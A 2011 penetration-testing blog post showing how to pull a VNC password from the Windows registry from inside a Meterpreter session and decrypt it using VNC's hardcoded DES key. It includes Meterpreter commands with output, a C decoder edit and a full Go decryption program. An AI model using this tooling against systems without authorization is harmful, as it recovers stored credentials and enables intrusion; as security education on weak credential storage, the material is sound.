Tuesday, March 15, 2011

VNC passwords and Metasploit and DES

Inside your Meterpreter shell, run getvncpw:

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

You're probably asking yourself what the F kind of password 3290e... is. Well, it's DES encrypted. Lucky for us the key is hardcoded (0x238210763578887), and since VNC is open source...

code here:

Change the relevant section:

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out 3290e903b5bf3769, so that line becomes:

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec

Or use this one, where you can just pass the hash on the command line and don't have to recompile every time.
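As an added example (not the author's vncdec.c, and not code from the VNC or Metasploit projects), here is a stand-alone decoder in Go that takes the registry value on the command line and uses the standard library's crypto/des. The one thing to get right when swapping VNC's bundled d3des for a standard DES library is that d3des reads key bits LSB-first, so the fixed key bytes are bit-reversed before use; the round-trip check with a constructed password is my own, since the post does not show what 3290e903b5bf3769 decrypts to.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
	"os"
	"strings"
)

// VNC's d3des.c hardcodes this key (decimal 23,82,107,6,35,78,88,7) and
// reads key bits LSB-first, so vncKey bit-reverses each byte for crypto/des.
var d3desFixedKey = [8]byte{23, 82, 107, 6, 35, 78, 88, 7}

func vncKey() []byte {
	k := make([]byte, 8)
	for i, b := range d3desFixedKey {
		k[i] = bits.Reverse8(b) // e.g. 0x17 -> 0xe8
	}
	return k
}

// decryptVNC takes the 16 hex chars from the registry value and returns
// the password: one DES-ECB block with trailing NUL padding stripped.
func decryptVNC(hexHash string) (string, error) {
	ct, err := hex.DecodeString(hexHash)
	if err != nil || len(ct) != des.BlockSize {
		return "", fmt.Errorf("expected 16 hex chars, got %q", hexHash)
	}
	block, _ := des.NewCipher(vncKey()) // 8-byte key: cannot fail
	pt := make([]byte, des.BlockSize)
	block.Decrypt(pt, ct)
	return strings.TrimRight(string(pt), "\x00"), nil
}

// encryptVNC mirrors what vncpasswd stores: the password is cut to
// 8 bytes, NUL-padded, and encrypted as a single DES-ECB block.
func encryptVNC(password string) string {
	pt := make([]byte, des.BlockSize)
	copy(pt, password) // copy writes at most len(pt) == 8 bytes
	block, _ := des.NewCipher(vncKey())
	ct := make([]byte, des.BlockSize)
	block.Encrypt(ct, pt)
	return hex.EncodeToString(ct)
}

func main() {
	pw, err := decryptVNC(strings.Join(os.Args[1:], "")) // no arg -> "" -> error
	if err != nil {
		fmt.Fprintln(os.Stderr, "usage: vncdec <16 hex chars>:", err)
		os.Exit(1)
	}
	fmt.Println(pw)
}
```

Run it as ./vncdec 3290e903b5bf3769 against the value getvncpw found. Because vncpasswd only ever stores one 8-byte block, anything past the first 8 characters of the original password is gone and cannot be recovered from the registry.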

1 comment:

mubix said...

I rewrote the script as a post module.

Info here:

Committed as of r12048